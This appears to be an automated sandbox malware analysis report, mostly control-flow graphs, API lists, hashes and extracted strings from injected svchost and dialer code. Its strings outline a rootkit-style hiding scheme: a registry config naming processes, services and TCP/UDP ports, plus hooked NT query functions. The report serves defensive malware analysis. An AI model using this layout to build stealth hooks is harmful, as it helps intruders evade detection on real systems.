48->19 57 140846241-14084624d GetProcAddressForCaller 50->57 51->57 52->28 58 1408461ce-1408461d2 52->58 53->33 54->38 55->54 59 14084629a-1408462a0 55->59 61 140846258 ExitProcess 57->61 62 14084624f-140846256 57->62 58->28 58->32 59->54 63 140846311-140846316 60->63 62->41 63->63 64 140846318 63->64
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002B.00000002.3126900800.0000000140840000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000002B.00000002.3126441769.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002B.00000002.3126900800.00000001404DC000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002B.00000002.3126900800.0000000140500000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002B.00000002.3126900800.0000000140503000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002B.00000002.3126900800.000000014078B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002B.00000002.3126900800.000000014080D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000002B.00000002.3136236054.0000000140847000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_43_2_140000000_dialer.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ProtectVirtual$AddressCallerLibraryLoadProc
                                                        • String ID:
                                                        • API String ID: 1941872368-0
                                                        • Opcode ID: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                        • Instruction ID: 1d24a93eb9004fb9ff5f788f669610d725ede0fbeb3cf7fc7a03e9414d8a6cfe
                                                        • Opcode Fuzzy Hash: a1a6b93e84e87096e5dff681e67215abf906e06b78acd350537f386d013f0bde
                                                        • Instruction Fuzzy Hash: FE611A32F4026255EB274BB6AF843E87751931D7B4F49433DCB79423E6FA7488668B02

                                                        Execution Graph

                                                        Execution Coverage:0.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:73
                                                        Total number of Limit Nodes:2
                                                        execution_graph 14790 26a8799273c 14792 26a8799276a 14790->14792 14791 26a87992858 LoadLibraryA 14791->14792 14792->14791 14793 26a879928d4 14792->14793 14794 26a879c1abc 14799 26a879c1628 GetProcessHeap 14794->14799 14796 26a879c1ad2 Sleep SleepEx 14797 26a879c1acb 14796->14797 14797->14796 14798 26a879c1598 StrCmpIW StrCmpW 14797->14798 14798->14797 14800 26a879c1648 _invalid_parameter_noinfo 14799->14800 14844 26a879c1268 GetProcessHeap 14800->14844 14802 26a879c1650 14803 26a879c1268 2 API calls 14802->14803 14804 26a879c1661 14803->14804 14805 26a879c1268 2 API calls 14804->14805 14806 26a879c166a 14805->14806 14807 26a879c1268 2 API calls 14806->14807 14808 26a879c1673 14807->14808 14809 26a879c168e RegOpenKeyExW 14808->14809 14810 26a879c18a6 14809->14810 14811 26a879c16c0 RegOpenKeyExW 14809->14811 14810->14797 14812 26a879c16e9 14811->14812 14813 26a879c16ff RegOpenKeyExW 14811->14813 14848 26a879c12bc RegQueryInfoKeyW 14812->14848 14814 26a879c1723 14813->14814 14815 26a879c173a RegOpenKeyExW 14813->14815 14859 26a879c104c RegQueryInfoKeyW 14814->14859 14819 26a879c1775 RegOpenKeyExW 14815->14819 14820 26a879c175e 14815->14820 14823 26a879c1799 14819->14823 14824 26a879c17b0 RegOpenKeyExW 14819->14824 14822 26a879c12bc 13 API calls 14820->14822 14825 26a879c176b RegCloseKey 14822->14825 14826 26a879c12bc 13 API calls 14823->14826 14827 26a879c17d4 14824->14827 14828 26a879c17eb RegOpenKeyExW 14824->14828 14825->14819 14831 26a879c17a6 RegCloseKey 14826->14831 14832 26a879c12bc 13 API calls 14827->14832 14829 26a879c1826 RegOpenKeyExW 14828->14829 14830 26a879c180f 14828->14830 14835 26a879c1861 RegOpenKeyExW 14829->14835 14836 26a879c184a 14829->14836 14834 26a879c104c 5 API calls 14830->14834 14831->14824 14833 26a879c17e1 RegCloseKey 14832->14833 14833->14828 14837 26a879c181c RegCloseKey 14834->14837 14839 26a879c1885 14835->14839 14840 26a879c189c RegCloseKey 14835->14840 14838 26a879c104c 5 API calls 14836->14838 14837->14829 14841 26a879c1857 RegCloseKey 14838->14841 14842 26a879c104c 5 API calls 14839->14842 14840->14810 14841->14835 14843 26a879c1892 RegCloseKey 14842->14843 14843->14840 14865 26a879d6168 14844->14865 14846 26a879c1283 GetProcessHeap 14847 26a879c12ae _invalid_parameter_noinfo 14846->14847 14847->14802 14849 26a879c1327 GetProcessHeap 14848->14849 14850 26a879c148a RegCloseKey 14848->14850 14853 26a879c133e _invalid_parameter_noinfo 14849->14853 14850->14813 14851 26a879c1476 GetProcessHeap HeapFree 14851->14850 14852 26a879c1352 RegEnumValueW 14852->14853 14853->14851 14853->14852 14855 26a879c13d3 GetProcessHeap 14853->14855 14856 26a879c141e lstrlenW GetProcessHeap 14853->14856 14857 26a879c13f3 GetProcessHeap HeapFree 14853->14857 14858 26a879c1443 StrCpyW 14853->14858 14866 26a879c152c 14853->14866 14855->14853 14856->14853 14857->14856 14858->14853 14860 26a879c11b5 RegCloseKey 14859->14860 14863 26a879c10bf _invalid_parameter_noinfo 14859->14863 14860->14815 14861 26a879c10cf RegEnumValueW 14861->14863 14862 26a879c114e GetProcessHeap 14862->14863 14863->14860 14863->14861 14863->14862 14864 26a879c116e GetProcessHeap HeapFree 14863->14864 14864->14863 14867 26a879c157c 14866->14867 14870 26a879c1546 14866->14870 14867->14853 14868 26a879c1565 StrCmpW 14868->14870 14869 26a879c155d StrCmpIW 14869->14870 14870->14867 14870->14868 14870->14869

                                                        Executed Functions

                                                        Function 0000026A879C1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 106492572-2879589442
                                                        • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction ID: 8b3f40dc757b03efebebe1ec2b21d8ee4b81ef9a05be350be4598fcd48a0c6e5
                                                        • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                        • Instruction Fuzzy Hash: 99715D76310E1086EF90DF66E89869D3BB4FB85B88F405111EE4E67B68EF3AC444CB45
                                                        Function 0000026A879C328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: bbd561d3a30add4c1150a9458a01d63078364739115671f5aea34e55c8598808
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 0211807261064182FFE0AB22F90D35D36A4A7D4385FD04124EA0EA3696EFBBC0849F13
                                                        Function 0000026A879C1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 0000026A879C1628: GetProcessHeap.KERNEL32 ref: 0000026A879C1633
                                                          • Part of subcall function 0000026A879C1628: HeapAlloc.KERNEL32 ref: 0000026A879C1642
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16B2
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16DF
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C16F9
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1719
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1734
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1754
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C176F
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C178F
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C17AA
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17CA
                                                        • Sleep.KERNEL32 ref: 0000026A879C1AD7
                                                        • SleepEx.KERNELBASE ref: 0000026A879C1ADD
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C17E5
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1805
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1820
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1840
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C185B
                                                          • Part of subcall function 0000026A879C1628: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C187B
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C1896
                                                          • Part of subcall function 0000026A879C1628: RegCloseKey.ADVAPI32 ref: 0000026A879C18A0
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: 5eed58e8f7c032d1df488f6ec5371d2936970acb8e97615792f8d803c15a43b0
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 2931E5F5240A4581FFD0AB26DA493BD73A4ABC4BD0F0454219E09A77DAFF26C491CE1A
                                                        Function 0000026A8799273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 110 26a8799273c-26a879927a4 call 26a879929d4 * 4 119 26a879929b2 110->119 120 26a879927aa-26a879927ad 110->120 121 26a879929b4-26a879929d0 119->121 120->119 122 26a879927b3-26a879927b6 120->122 122->119 123 26a879927bc-26a879927bf 122->123 123->119 124 26a879927c5-26a879927e6 123->124 124->119 126 26a879927ec-26a8799280c 124->126 127 26a87992838-26a8799283f 126->127 128 26a8799280e-26a87992836 126->128 129 26a87992845-26a87992852 127->129 130 26a879928df-26a879928e6 127->130 128->127 128->128 129->130 131 26a87992858-26a8799286a LoadLibraryA 129->131 132 26a87992992-26a879929b0 130->132 133 26a879928ec-26a87992901 130->133 135 26a879928ca-26a879928d2 131->135 136 26a8799286c-26a87992878 131->136 132->121 133->132 134 26a87992907 133->134 137 26a8799290d-26a87992921 134->137 135->131 139 26a879928d4-26a879928d9 135->139 138 26a879928c5-26a879928c8 136->138 141 26a87992923-26a87992934 137->141 142 26a87992982-26a8799298c 137->142 138->135 143 26a8799287a-26a8799287d 138->143 139->130 145 26a87992936-26a8799293d 141->145 146 26a8799293f-26a87992943 141->146 142->132 142->137 147 26a879928a7-26a879928b7 143->147 148 26a8799287f-26a879928a5 143->148 149 26a87992970-26a87992980 145->149 150 26a87992945-26a8799294b 146->150 151 26a8799294d-26a87992951 146->151 152 26a879928ba-26a879928c1 147->152 148->152 149->141 149->142 150->149 153 26a87992963-26a87992967 151->153 154 26a87992953-26a87992961 151->154 152->138 153->149 156 26a87992969-26a8799296c 153->156 154->149 156->149
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 57387411ffdeb412b963753acb60f61000c0759ef6c355c86f1a01fa76b5fc3d
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: B5613532B016908BFB94CF15D10872DF3A6FB54BA4F588121DF59277C8DA39D892CB01

                                                        Non-executed Functions

                                                        Function 0000026A879C2B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 363 26a879c2b2c-26a879c2ba5 call 26a879e2ce0 366 26a879c2ee0-26a879c2f03 363->366 367 26a879c2bab-26a879c2bb1 363->367 367->366 368 26a879c2bb7-26a879c2bba 367->368 368->366 369 26a879c2bc0-26a879c2bc3 368->369 369->366 370 26a879c2bc9-26a879c2bd9 GetModuleHandleA 369->370 371 26a879c2bdb-26a879c2beb call 26a879d6090 370->371 372 26a879c2bed 370->372 373 26a879c2bf0-26a879c2c0e 371->373 372->373 373->366 377 26a879c2c14-26a879c2c33 StrCmpNIW 373->377 377->366 378 26a879c2c39-26a879c2c3d 377->378 378->366 379 26a879c2c43-26a879c2c4d 378->379 379->366 380 26a879c2c53-26a879c2c5a 379->380 380->366 381 26a879c2c60-26a879c2c73 380->381 382 26a879c2c83 381->382 383 26a879c2c75-26a879c2c81 381->383 384 26a879c2c86-26a879c2c8a 382->384 383->384 385 26a879c2c9a 384->385 386 26a879c2c8c-26a879c2c98 384->386 387 26a879c2c9d-26a879c2ca7 385->387 386->387 388 26a879c2d9d-26a879c2da1 387->388 389 26a879c2cad-26a879c2cb0 387->389 392 26a879c2da7-26a879c2daa 388->392 393 26a879c2ed2-26a879c2eda 388->393 390 26a879c2cc2-26a879c2ccc 389->390 391 26a879c2cb2-26a879c2cbf call 26a879c199c 389->391 395 26a879c2cce-26a879c2cdb 390->395 396 26a879c2d00-26a879c2d0a 390->396 391->390 397 26a879c2dbb-26a879c2dc5 392->397 398 26a879c2dac-26a879c2db8 call 26a879c199c 392->398 393->366 393->381 395->396 402 26a879c2cdd-26a879c2cea 395->402 403 26a879c2d3a-26a879c2d3d 396->403 404 26a879c2d0c-26a879c2d19 396->404 399 26a879c2dc7-26a879c2dd4 397->399 400 26a879c2df5-26a879c2df8 397->400 398->397 399->400 406 26a879c2dd6-26a879c2de3 399->406 407 26a879c2e05-26a879c2e12 lstrlenW 400->407 408 26a879c2dfa-26a879c2e03 call 26a879c1bbc 400->408 409 26a879c2ced-26a879c2cf3 402->409 411 26a879c2d3f-26a879c2d49 call 26a879c1bbc 403->411 412 26a879c2d4b-26a879c2d58 lstrlenW 403->412 404->403 410 26a879c2d1b-26a879c2d28 404->410 414 26a879c2de6-26a879c2dec 406->414 420 26a879c2e14-26a879c2e1e 407->420 421 26a879c2e35-26a879c2e3f call 26a879c3844 407->421 408->407 426 26a879c2e4a-26a879c2e55 408->426 418 26a879c2cf9-26a879c2cfe 409->418 419 26a879c2d93-26a879c2d98 409->419 422 26a879c2d2b-26a879c2d31 410->422 411->412 411->419 415 26a879c2d5a-26a879c2d64 412->415 416 26a879c2d7b-26a879c2d8d call 26a879c3844 412->416 425 26a879c2dee-26a879c2df3 414->425 414->426 415->416 427 26a879c2d66-26a879c2d79 call 26a879c152c 415->427 416->419 430 26a879c2e42-26a879c2e44 416->430 418->396 418->409 419->430 420->421 431 26a879c2e20-26a879c2e33 call 26a879c152c 420->431 421->430 422->419 432 26a879c2d33-26a879c2d38 422->432 425->400 425->414 434 26a879c2e57-26a879c2e5b 426->434 435 26a879c2ecc-26a879c2ed0 426->435 427->416 427->419 430->393 430->426 431->421 431->426 432->403 432->422 440 26a879c2e63-26a879c2e7d call 26a879c85c0 434->440 441 26a879c2e5d-26a879c2e61 434->441 435->393 444 26a879c2e80-26a879c2e83 440->444 441->440 441->444 447 26a879c2ea6-26a879c2ea9 444->447 448 26a879c2e85-26a879c2ea3 call 26a879c85c0 444->448 447->435 450 26a879c2eab-26a879c2ec9 call 26a879c85c0 447->450 448->447 450->435
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 28832ac34e84ece53f7b50bb78eaf8a37b486e288825972d32e086a5872c7075
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 42B17A76210A9082EFE8DF25D4487AD77A5FB94B84F445026EE0977798EF36CC80CB42
                                                        Function 0000026A879C7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 938e5285386ac3705a1524c506204be3636963da77c64c4e1ce6b6d8eddc6828
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: 50315072205B808AEBA0DF60E8847ED7B64F785744F44442AEB4D67B98EF39C548CB11
                                                        Function 0000026A879CD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction ID: d1d1b9292f01f4f5fbfa14a2dc646865464e2607e4ff46e76a86c3c994235719
                                                        • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                        • Instruction Fuzzy Hash: DC318132214F8086EBA0DF25E88439E7BA4F7C9798F540126EA9D53B98EF39C545CF01
                                                        Function 0000026A879C12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 07cfe981894990384c0c086665b30c926e9edc38e061a20603f020415e03ff94
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: 70514A76204B8486EB94CF62E54835EBFA1F78AFD9F048124EA4A57758EF3DC049CB01
                                                        Function 0000026A879C1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136771059.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a879c0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: dfe63a10a49480e1aef6057fb1ce33c2d81f6763df8e5d6cfa68f1b74ee8636c
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: EF31C8B5144A4AA0FE94EF65E85A7EC3B24F784348FC04013954933176AFBEC289CF92
                                                        Function 0000026A87996910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 205 26a87996910-26a87996916 206 26a87996918-26a8799691b 205->206 207 26a87996951-26a8799695b 205->207 209 26a87996945-26a87996984 call 26a87996fc0 206->209 210 26a8799691d-26a87996920 206->210 208 26a87996a78-26a87996a8d 207->208 214 26a87996a9c-26a87996ab6 call 26a87996e54 208->214 215 26a87996a8f 208->215 228 26a87996a52 209->228 229 26a8799698a-26a8799699f call 26a87996e54 209->229 212 26a87996922-26a87996925 210->212 213 26a87996938 __scrt_dllmain_crt_thread_attach 210->213 219 26a87996927-26a87996930 212->219 220 26a87996931-26a87996936 call 26a87996f04 212->220 217 26a8799693d-26a87996944 213->217 226 26a87996ab8-26a87996aed call 26a87996f7c call 26a87996e1c call 26a87997318 call 26a87997130 call 26a87997154 call 26a87996fac 214->226 227 26a87996aef-26a87996b20 call 26a87997190 214->227 221 26a87996a91-26a87996a9b 215->221 220->217 226->221 237 26a87996b22-26a87996b28 227->237 238 26a87996b31-26a87996b37 227->238 232 26a87996a54-26a87996a69 228->232 240 26a879969a5-26a879969b6 call 26a87996ec4 229->240 241 26a87996a6a-26a87996a77 call 26a87997190 229->241 237->238 242 26a87996b2a-26a87996b2c 237->242 243 26a87996b39-26a87996b43 238->243 244 26a87996b7e-26a87996b94 call 26a8799268c 238->244 259 26a87996a07-26a87996a11 call 26a87997130 240->259 260 26a879969b8-26a879969dc call 26a879972dc call 26a87996e0c call 26a87996e38 call 26a8799ac0c 240->260 241->208 248 26a87996c1f-26a87996c2c 242->248 249 26a87996b45-26a87996b4d 243->249 250 26a87996b4f-26a87996b5d call 26a879a5780 243->250 262 26a87996b96-26a87996b98 244->262 263 26a87996bcc-26a87996bce 244->263 256 26a87996b63-26a87996b78 call 26a87996910 249->256 250->256 272 26a87996c15-26a87996c1d 250->272 256->244 256->272 259->228 281 26a87996a13-26a87996a1f call 26a87997180 259->281 260->259 308 26a879969de-26a879969e5 __scrt_dllmain_after_initialize_c 260->308 262->263 269 26a87996b9a-26a87996bbc call 26a8799268c call 26a87996a78 262->269 270 26a87996bd5-26a87996bea call 26a87996910 263->270 271 26a87996bd0-26a87996bd3 263->271 269->263 302 26a87996bbe-26a87996bc6 call 26a879a5780 269->302 270->272 290 26a87996bec-26a87996bf6 270->290 271->270 271->272 272->248 292 26a87996a45-26a87996a50 281->292 293 26a87996a21-26a87996a2b call 26a87997098 281->293 296 26a87996bf8-26a87996bff 290->296 297 26a87996c01-26a87996c11 call 26a879a5780 290->297 292->232 293->292 307 26a87996a2d-26a87996a3b 293->307 296->272 297->272 302->263 307->292 308->259 309 26a879969e7-26a87996a04 call 26a8799abc8 308->309 309->259
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000002D.00000002.3136240029.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_45_2_26a87990000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                        • API String ID: 190073905-1786718095
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: b047a768bb49e332fa12a0d509f504b7dc68172f8f015219012fb81a31179565
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: DB81D23170524186FBD0EF65944D39D72E1EB87780F588425AA0977796EF3BC9868F03
                                                        Function 0000026A879CCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • GetLastError.KERNEL32 ref: 0000026A879CCE37
                                                        • FlsGetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCE4C
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCE6D
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCE9A
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCEAB
                                                        • FlsSetValue.KERNEL32(?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCEBC
                                                        • SetLastError.KERNEL32 ref: 0000026A879CCED7
                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF0D
                                                        • FlsSetValue.KERNEL32(?,?,00000001,0000026A879CECCC,?,?,?,?,0000026A879CBF9F,?,?,?,?,?,0000026A879C7AB0), ref: 0000026A879CCF2C
                                                          • Part of subcall function 0000026A879CD6CC: HeapAlloc.KERNEL32 ref: 0000026A879CD721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000026A879D0A6B,?,?,?,0000026A879D045C,?,?,?,0000026A879CC84F), ref: 0000026A879CCF54
                                                          • Part of subcall function 0000026A879CD744: HeapFree.KERNEL32 ref: 0000026A879CD75A
                                                          • Part of subcall function 0000026A879CD744: GetLastError.KERNEL32 ref: 0000026A879CD764
